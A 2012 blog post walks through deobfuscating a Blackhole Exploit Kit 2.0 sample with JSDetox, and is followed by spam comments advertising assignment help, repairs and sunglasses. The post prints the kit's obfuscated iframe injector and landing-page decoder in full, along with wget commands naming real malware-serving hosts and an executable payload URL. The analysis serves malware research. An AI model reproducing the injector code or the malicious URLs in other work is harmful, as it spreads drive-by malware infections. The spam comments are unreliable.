Thursday, September 27, 2012

Analyzing the Blackhole Exploit Kit 2.0 with JSDetox

With the release of the new Blackhole Exploit Kit version, I wanted to check if JSDetox is still able to analyze it. As it turns out, the process is not much different from the last version (shown in this screencast).
I checked http://www.malwaredomainlist.com/update.php to find a current sample. Of course you should not visit those URLs with your normal browser as they contain malware - I will not "hide" those URLs here as they are publicly documented (and seem to be taken offline by now). The same applies for the tool JSDetox, you should run it in an isolated environment.

The obfuscated iframe leading to the exploit kit sounds interesting, so lets use that one:
wget -O pho.htm "basijkarmandan.danaportal.ir/pho.htm"
The downloaded file contains this:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head>
<body>

<h1><b>Please wait a moment. You will be forwarded...</h1></b>


<script>v="va"+"l";try{ebgserb++;}catch(snregrx){try{gnezrg|326}catch(ztbet){m=Math;ev=window[""+"e"+v];}ff="fromC"+"ha";if(020==0x10)ff+="rCode";n="25&&26&&121&&119&&48&&57&&116&&128&&115&&134&&125&&118&&126&&133&&62&&120&&117&&133&&85&&125&&117&&126&&117&&127&&132&&132&&82&&138&&100&&114&&119&&95&&113&&126&&117&&57&&55&&115&&127&&117&&137&&56&&57&&108&&64&&110&&57&&140&&29&&26&&25&&26&&121&&119&&130&&114&&125&&118&&130&&57&&57&&76&&29&&26&&25&&142&&48&&118&&124&&132&&117&&49&&139&&30&&25&&26&&25&&117&&127&&116&&133&&126&&117&&127&&132&&63&&135&&131&&121&&133&&117&&57&&50&&77&&121&&119&&130&&114&&125&&118&&48&&132&&130&&116&&77&&56&&120&&133&&132&&129&&74&&64&&63&&122&&127&&129&&127&&127&&117&&132&&124&&114&&124&&63&&130&&134&&74&&73&&64&&73&&64&&64&&118&&128&&130&&134&&125&&64&&124&&122&&126&&124&&131&&64&&115&&128&&124&&134&&125&&127&&62&&129&&120&&129&&55&&49&&135&&122&&116&&133&&120&&78&&55&&66&&64&&56&&48&&121&&117&&122&&119&&121&&132&&78&&55&&66&&64&&56&&48&&132&&132&&138&&124&&118&&77&&56&&134&&122&&131&&122&&114&&122&&124&&122&&132&&138&&74&&121&&121&&117&&116&&118&&126&&76&&128&&128&&131&&122&&132&&122&&127&&127&&74&&114&&114&&132&&127&&125&&133&&133&&117&&76&&124&&118&&118&&133&&74&&65&&75&&133&&127&&129&&74&&65&&75&&56&&78&&77&&63&&122&&118&&131&&113&&126&&117&&79&&50&&58&&75&&30&&25&&26&&141&&30&&25&&26&&118&&134&&126&&116&&132&&122&&127&&127&&48&&122&&118&&131&&113&&126&&117&&131&&56&&58&&139&&30&&25&&26&&25&&135&&113&&131&&48&&119&&48&&78&&48&&117&&127&&116&&133&&126&&117&&127&&132&&63&&115&&131&&117&&114&&132&&118&&85&&125&&117&&126&&117&&127&&132&&57&&55&&122&&118&&131&&113&&126&&117&&56&&57&&76&&118&&63&&131&&118&&132&&82&&132&&133&&130&&122&&114&&134&&132&&118&&56&&56&&131&&131&&115&&56&&60&&56&&120&&133&&132&&129&&74&&64&&63&&122&&127&&129&&127&&127&&117&&132&&124&&114&&124&&63&&130&&134&&74&&73&&64&&73&&64&&64&&118&&128&&130&&134&&125&&64&&124&&122&&126&&124&&131&&64&&115&&128&&124&&134&&125&&127&&62&&129&&120&&129&&55&&58&&75&&119&&62&&132&&132&&138&&124&&118&&62&&135&&121&&132&&121&&115&&121&&125&&121&&133&&137&&78&&55&&121&&121&&117&&116&&118&&126&&56&&75&&119&&62&&132&&132&&138&&124&&118&&62&&129&&127&&132&&121&&133&&121&&128&&126&&78&&55&&114&&114&&132&&127&&125&&133&&133&&117&&56&&75&&119&&62&&132&&132&&138&&124&&118&&62&&125&&117&&119&&132&&78&&55&&65&&55&&76&&118&&63&&131&&133&&137&&125&&117&&63&&132&&128&&128&&78&&55&&65&&55&&76&&118&&63&&131&&118&&132&&82&&132&&133&&130&&122&&114&&134&&132&&118&&56&&56&&135&&122&&116&&133&&120&&56&&60&&56&&65&&65&&55&&58&&75&&119&&62&&132&&117&&133&&81&&133&&132&&131&&121&&115&&133&&133&&117&&57&&55&&121&&117&&122&&119&&121&&132&&56&&60&&56&&65&&65&&55&&58&&75&&30&&25&&26&&25&&117&&127&&116&&133&&126&&117&&127&&132&&63&&119&&118&&132&&86&&124&&118&&125&&118&&126&&133&&131&&83&&137&&101&&113&&120&&94&&114&&125&&118&&56&&56&&114&&128&&116&&138&&55&&58&&107&&65&&109&&63&&113&&129&&128&&118&&126&&117&&83&&121&&121&&125&&116&&57&&118&&58&&75&&30&&25&&26&&141".split("&&");h=2;s="";if(m)for(i=0;i-605!=0;i=1+i){k=i;s+=String[ff](n[i]-(020+i%h));}if(020==0x10)ev(s);}</script>

</body>
</html>
Paste the javascript code into the textbox in the "Code Analysis" tab and click "Execute":

The code tries to call "window.eval()" - click "Show Code" to see what would be executed:

Click "Send to Analyze" to view the code in the code analysis tab and click "Analyze" to see a formatted version of the code:

Downloading the content of the created iframe...
wget -O column.php "http://ioponeslal.ru:8080/forum/links/column.php?qqx=3633370907&mwafe=3307093738070736060b&gisvsv=04&zwhltu=uvlnuxbx&knl=utqwoyzf"
This file contains 29kb of data and looks like this (shortened):
<html><body><script>g="getElementById";cc="concat";ss=String.fromCharCode;gg="getAttribute";function asd(){try{(alert+"fewfbw")()}catch(adgsdg){window["e"+"v"+"a"+"l"](s);}}</script><u id="google" 
d0="+4442494b46)3d42142o3o$453j3l3q2c%3h443h3f44*254b463h42$433l3r3q22_161k1i1r1i&20161g3q3d&3p3h22162o!3o453j3l3q!2c3h443h3f)44161g3k3d&3q3g3o3h42$223i453q3f$443l3r3q1c(3f1g3e1g3d#1d4b423h44+45423q143i$453q3f443l_3r3q1c1d4b#3f1c3e1g3d#1d4d4d1g3l@432c3h3i3l@3q3h3g223i!453q3f443l#3r3q1c3e1d+4b423h4445!42" 

[snip]

d91="43#3h1c1d234d%3f3d443f3k_1c3h1d4b4d*4442494b47&3l443k1c42%3d1l1d4b43&3k3h3o3o3h(483h3f4544^3h1c423d1o$1d234d4d3f!3d443f3k1c%3h1d4b4d4d+3f3d443f3k@1c3h1d4b4d#4d3f3d443f#3k1c3h4242!3q3r1d4b4d!3g3r3f453p$3h3q441i47_423l443h1c+1b1b1d2343$3h44303l3p&3h3r45441c%3h3q3g3b42#3h3g3l423h)3f441g1q1k)1k1k1k1d23"></u><script>
a=document[g]("google");
s="";
for(i=0;;i++){
r=a[gg]("d"[cc](i));
if(r){s=s+r;}else break;
}
a=s;
k="";
a=a.replace(/[^0-9a-z]/g,k);
s="";
for(i=0;i<a.length;i+=2){
try{gbargre-0x32}catch(sdgsdg){if(020==0x10)s+=ss(parseInt(a.substr(i,2),0x1c));}
}
asd();
</script></body></html>
The last version of the Blackhole Exploit Kit I analyzed stored the obfuscated data in the text content of HTML attributes, this version uses different attributes of one single HTML element. To analyze this in JSDetox, copy the whole content of the file in the textbox in the "HTML Document" tab and click "Extract Scripts":

You are then taken to the "Code Analysis" tab where you can analyze the code (it is a decoding loop) or directly execute the script:

JSDetox logs that the code executed "document.getElementById" (to access the big HTML element containing the obfuscated code) and that it emulated that access with the imported HTML data. JSDetox then catches a call to "window.eval()" and makes it possible to view the code that would be executed (click "Show Code" and then "Send to Analyze").

Click "Reformat" to make the code readable. At the end of the code, we find this:

Downloading the file:
wget -O cee0c21.exe "http://ioponeslal.ru:8080/forum/links/column.php?qqx=3633370907&mwafe=3307093738070736060b&gisvsv=04&zwhltu=uvlnuxbx&knl=utqwoyzf"
A check on virustotal gives a detection rate of 6/43, a few ours later it was 11/43 with some major vendors still missing it:

10 comments:

  1. It seems great! Here are some discount ray ban sunglasses for you.

    ReplyDelete
  2. شركتنا من المتميزون في اعمال الاصلاح بدون هدم او تكسير من خلال شركة ركن البيت التي تقدم الكثير والكثير في عمل اللازم وتصحيح الاخطاء التي تسببها تسريبات المياه فنحن مثلا

    شركة كشف تسربات المياه بجدة تقدم خدمة لعمل الاصلاح بدون اي خراب ونقدم النصيحة للعملاء بالابتعاد عن الاعمال التي تؤدي الي هذا الخراب فتعاملك مع شركة كشف تسربات بجدة لديها الخبرة الكافية تساعدك في الحفاظ علي منزلك كما اننا نتمكن في اننا سوف نرتقي بخدمة لاننا نقوم بالعمل السليم لها كما يوجد لدينا خدمات العوازل التي تمنع التسريبات من الاسقف لكم والحوائط والخزانات من خلال شركة تسمي الاولي في مجالها لذلك نحن نقدم شركة عزل خزانات بالرياض التي تعتبر في عل الخزانات الارضية من الداخل بواسطة مواد متميزة كما نقدم لكم شركة عزل اسطح بالرياض لعمل العوازل التي تمنع جميع التسريبات في الاسقف

    ReplyDelete
  3. One of the most prominent issues the students have to deal with while writing assignments is plagiarism. Hence, they extensively use free plagiarism checker to check if there are any copied content in the paper.
    Another major reason for using plagiarism checkers is that universities do not accept plagiarized content. Plagiarism is a serious offence. Hence, if found, the students are suspended or might even lose the grades.
    Due to these limitations, it is evident that the plagiarism checking & word counter tool are not at all effective to check plagiarism. The term plagiarism is actually very broad. It is merely not coping with words. But these tools, unfortunately, detect words but not ideas. Hence, the chances of plagiarized papers remain.

    ReplyDelete
  4. I suggest everyone to choose Assignment Help Australia for getting the best guidance in their academia. The proficient experts assist as per the requirements and learning styles desired by the university.

    ReplyDelete
  5. There are many other things as well which you keep in mind before choosing it. Go through their samples before choosing any website. So, you can understand the knowledge of assignment experts. Assignment help play an important role as they are the one who writes their assignments.
    Programming help

    Java Assignment help

    ReplyDelete
  6. Thanks for sharing useful information to getting Assignment Help in correct way. If you need any information for hiring an academic writer, place your call via greatassignmenthelp and talk to expert for resolving your concerns.
    Assignment Help Online
    Online Assignment Help
    Assignment Help Online Services
    Assignment Helper
    Assignment Assistance
    Assignment Help Experts
    Online Assignment Help Services
    Assignment Writing Help

    ReplyDelete
  7. Thanks for updating the post! Your post has shared all essential information of Assignment Help very clearly. Students should opt for online assignment writing services in order to save their time. For more details regarding the best academic writing, connect with customer care services of assignmenthelpshop
    Assignment Help Online
    Online Assignment Help
    Assignment Help Online Service
    Assignment Helper
    Assignment Assistance
    Assignment Help Experts
    Online Assignment Help Services

    ReplyDelete
  8. The mt everest base camp trek is the best trekking adventure in the world. It is a best journey to Mount Everest.

    ReplyDelete
  9. Thank you for sharing valuable information. Nice post. I enjoyed reading this post.
    Paperssolution
    topacademictutors

    ReplyDelete